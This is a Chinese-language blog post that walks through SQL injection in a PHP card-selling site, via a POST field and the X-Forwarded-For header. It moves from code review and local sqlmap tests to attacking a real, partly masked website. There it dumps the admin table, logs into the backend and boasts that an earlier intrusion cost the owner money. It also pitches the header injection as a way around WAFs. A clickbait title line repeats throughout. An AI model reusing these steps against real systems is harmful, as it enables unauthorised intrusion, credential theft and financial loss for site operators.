微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

相关环境

源码信息:你猜啊

漏洞类型:Forwarded-For注入

搭建成功之后如下 :

看到如下页面是不是有似曾相识的感受:

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

进群:125240963   即可获取数十套PDF哦!

上图是安装过后的首页,就是一个提卡网,继续吧!

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

这里很明显我们看到了sql注入,首先判断是否设置$_POST[“dh”]不为空则将该参数拼接到sql语句中,看到这里就可以判断出该程序存在联合查询注入,可是$config哪来的,这个文件也没包含其它的文件啊!!!怎么办呢?那么我们就来找找index文件中是否包含了api.PHP,search一下

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

可以看到在294行这里包含了api.PHP文件,我们构造下放入sqlmap中玩一玩。

Python sqlmap.py -u “http://localhost:8081/index.PHP” --batch --dbms=”MysqL” --data=”dh=a”

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

我们尝试本地站点的时候毫无问题,为什么这个提卡网就没有存在这个问题了呢?很明显这个网站可能是升级或者二开发过的,我们接着看看其它点,进入./pay/pay.PHP文件

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

代码过多就不一一贴图出来了,主要构成漏洞的代码在这其中,我们从38行开始看着走。

这里判断$_GET[“type”]等于delete的时候则执行40-49行的代码,41将获取到的ip拼接到sql语句中,我们看看ip函数

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

好了,现在我们打开burp进行抓包,然后伪造ip进行一系列的嘿嘿了,因为./pay/index.PHP中包含了pay.PHP,所以我们对index.PHP进行注入就好

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

正常页面

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

错误页面

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

好的,现在看到了吧!我们放到sqlmap中跑一下看看,我们将这个数据包保存到文本中,并且标注注入位置:X-Forwarded-For这个注入还自带绕过waf功能,因为很多waf不会检测hander参数。

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

Python sqlmap.py -r test.txt --batch --dbms="MysqL"

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

我们对那个网站测试一番,访问:http://lxxxx.pw/pay/index.PHP?type=zfb&money=1&title=adssad&pwd=123

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

把该数据放到文本中,接着进行测试:

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

Python sqlmap.py -r test.txt --batch --dbms="MysqL"

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

成功挖掘到了该网站的漏洞,继续。

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

Python sqlmap.py -r test.txt --batch -D yulinxscom --tables

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

Python sqlmap.py -r test.txt --batch -D yulinxscom -T admin --dump

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

拿到了管理账号及密码。接着访问。

后台:http://lxxxx.pw/admin.PHP

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

由于之前进去过一次,让他亏损了点钱,现在后台的名字也改了 。

就因为用写了一个自助提卡系统!居然一个月挣的比一年多!勿商用

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐